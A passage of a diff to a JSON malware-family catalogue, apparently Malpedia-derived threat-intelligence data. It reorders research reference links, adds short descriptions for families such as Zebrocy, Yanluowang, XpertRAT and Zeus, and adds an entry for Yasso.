"https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-twilight" + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ "chopstick", @@ -51018,10 +53519,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy", - "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/", "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", + "https://github.com/eset/malware-ioc/tree/master/xdspy/", "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf", - "https://github.com/eset/malware-ioc/tree/master/xdspy/" + "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/" ], "synonyms": [], "type": [] @@ -51090,8 +53591,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr", - "https://twitter.com/r3c0nst/status/1166773324548063232", - "https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/" + "https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/", + "https://twitter.com/r3c0nst/status/1166773324548063232" ], "synonyms": [], "type": [] @@ -51128,7 +53629,7 @@ "value": "xmrig" }, { - "description": "", + "description": "According to PCrisk, Xorist is a family of ransomware-type malware. After stealth system infiltration, ransomware from this family encrypts various files stored on the computer. After encrypting the files, this ransomware creates a 'How to Decrypt Files.txt text file on the victim's desktop. The file contains a message stating that the files can only be restored by paying a ransom.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xorist", @@ -51160,9 +53661,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpack", + "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html", "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks", - "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks" ], "synonyms": [ "NERAPACK" @@ -51177,8 +53678,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", - "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", - "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" + "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", + "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" ], "synonyms": [], "type": [] @@ -51204,13 +53705,13 @@ "value": "XPCTRA" }, { - "description": "", + "description": "According to PCrisk, XpertRAT is a Remote Administration Trojan, a malicious program that allows cyber criminals to remotely access and control infected computers. Typically, users download and install this software inadvertently because they are tricked. By having computers infected with malware such as XpertRAT, users can experience serious problems.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat", "https://labs.k7computing.com/?p=15672", - "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration", - "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html" + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", + "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration" ], "synonyms": [], "type": [] @@ -51252,9 +53753,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [ "nokian" @@ -51269,18 +53770,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", - "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", - "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", - "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-twilight" + "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ "Shunnael", @@ -51306,7 +53807,7 @@ "value": "X-Tunnel (.NET)" }, { - "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", @@ -51323,9 +53824,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm", - "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/", + "https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/", + "https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/", + "https://x.com/embee_research/status/1694635899903152619", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/" + "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/" ], "synonyms": [], "type": [] @@ -51338,12 +53844,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.macnica.net/mpressioncss/feature_05.html/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.secureworks.com/research/threat-profiles/bronze-butler", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors", + "https://www.secureworks.com/research/threat-profiles/bronze-butler", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" ], "synonyms": [ @@ -51389,9 +53895,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yamabot", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.youtube.com/watch?v=nUjxH1gW53s", + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html?m=1", - "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html" + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html" ], "synonyms": [ "Kaos" @@ -51402,19 +53910,19 @@ "value": "YamaBot" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Yanluowang is ransomware that encrypts (and renames) files, ends all running processes, stops services, and creates the \"README.txt\" file containing a ransom note. It appends the \".yanluowang\" extension to filenames. Cybercriminals behind Yanluowang are targeting enterprise entities and organizations in the financial sector.\r\n\r\nFiles encrypted by Yanluowang can be decrypted with this tool (it is possible to decrypt all files if the original file is larger than 3GB. If the original file is smaller than 3GB, then only smaller files can be decrypted).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/", - "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang", + "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/", "https://de.darktrace.com/blog/inside-the-yanluowang-leak-organization-members-and-tactics", - "https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html", "https://twitter.com/CryptoInsane/status/1586967110504398853", - "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/" + "https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/", + "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware", + "https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/" ], "synonyms": [ "Dryxiphia" @@ -51429,8 +53937,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/" ], "synonyms": [], "type": [] @@ -51443,8 +53951,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq", - "https://twitter.com/GrujaRS/status/1210541690349662209", - "https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview" + "https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview", + "https://twitter.com/GrujaRS/status/1210541690349662209" ], "synonyms": [], "type": [] @@ -51452,6 +53960,19 @@ "uuid": "3bba089d-cd27-465c-8c40-2ff9ff0316c6", "value": "Yarraq" }, + { + "description": "According to Palo Alto Networks, Yasso is an open source multi-platform intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and running arbitrary commands. It is authored by a Mandarin-speaking pentester nicknamed Sairson.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yasso", + "https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d58a18e8-e866-42df-a315-a1f72d2c26aa", + "value": "Yasso" + }, { "description": "", "meta": { @@ -51557,7 +54078,7 @@ "value": "YourCyanide" }, { - "description": "", + "description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it\u2019s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer", @@ -51575,13 +54096,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", - "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/", "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", - "http://blog.ptsecurity.com/2019/11/studying-donot-team.html", - "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", "https://www.secureworks.com/research/threat-profiles/zinc-emerson", - "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + "http://blog.ptsecurity.com/2019/11/studying-donot-team.html", + "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/", + "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/", + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/" ], "synonyms": [], "type": [] @@ -51633,43 +54154,43 @@ "value": "Zacinlo" }, { - "description": "", + "description": "According to brandefense, Zebrocy is malware that falls into the Trojan category, which the threat actor group APT28/Sofacy has used since 2015. Zebrocy malware consists of 3 main components; Backdoor, Downloader, and Dropper. The Downloader and Dropper take responsibility for discovery processes and downloading the main malware on the systems. At the same time, Backdoor undertakes the duties such as persistence in the system, espionage, and data extraction.\r\n\r\nThis malware, which is not considered new, has variants in many languages from the past to the present. These include programming languages such as Delphi, C#, Visual C++, VB.net, and Golang. Furthermore, we know advanced threat actors and groups revise their malicious software among their toolkits at certain time intervals using different languages and technologies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", - "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/", - "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", - "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", - "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", - "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/", - "https://research.checkpoint.com/malware-against-the-c-monoculture/", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", - "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/", "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/", - "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://meltx0r.github.io/tech/2019/10/24/apt28.html", - "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", - "https://www.secureworks.com/research/threat-profiles/iron-twilight", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://brandefense.io/zebrocy-malware-technical-analysis-report/", + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://securelist.com/a-zebrocy-go-downloader/89419/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g", "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", + "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/", + "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", + "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", + "https://meltx0r.github.io/tech/2019/10/24/apt28.html", + "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", + "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/", - "https://securelist.com/a-zebrocy-go-downloader/89419/", - "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://brandefense.io/zebrocy-malware-technical-analysis-report/", - "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b", + "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og" ], "synonyms": [ "Zekapab" @@ -51736,20 +54257,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/", - "https://community.riskiq.com/article/47766fbd", - "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html", "https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf", + "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html", + "https://community.riskiq.com/article/47766fbd", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-223A_Zeppelin_CSA.pdf", "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", - "https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin", "https://www.cisa.gov/uscert/ncas/alerts/aa22-223a", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "synonyms": [], @@ -51763,16 +54284,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", - "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", - "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", - "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", - "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/", - "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", + "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", - "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/" + "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", + "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", + "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", + "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", + "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" ], "synonyms": [ "Max++", @@ -51789,13 +54310,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government", "https://www.ibm.com/downloads/cas/OAJ4VZNJ", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/" ], "synonyms": [], "type": [] @@ -51858,50 +54379,51 @@ "value": "ZeroT" }, { - "description": "", + "description": "According to CrowdStrike, The two primary goals of the Zeus trojan horse virus are stealing people's financial information and adding machines to a botnet. Unlike many types of malware, most Zeus variants try to avoid doing long-term damage to the devices they infect. Their aim is to avoid detection from antivirus software.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", "https://www.secureworks.com/research/threat-profiles/bronze-woodland", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", + "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "http://eternal-todo.com/blog/detecting-zeus", - "https://www.s21sec.com/en/zeus-the-missing-link/", - "https://www.wired.com/2017/03/russian-hacker-spy-botnet/", - "https://www.secureworks.com/research/zeus?threat=zeus", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", - "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", - "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", - "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", - "https://www.mnin.org/write/ZeusMalware.pdf", - "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", - "https://unit42.paloaltonetworks.com/banking-trojan-techniques/", - "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://www.mnin.org/write/ZeusMalware.pdf", "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html", - "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", - "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", - "https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/", - "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", - "http://eternal-todo.com/blog/zeus-spreading-facebook", + 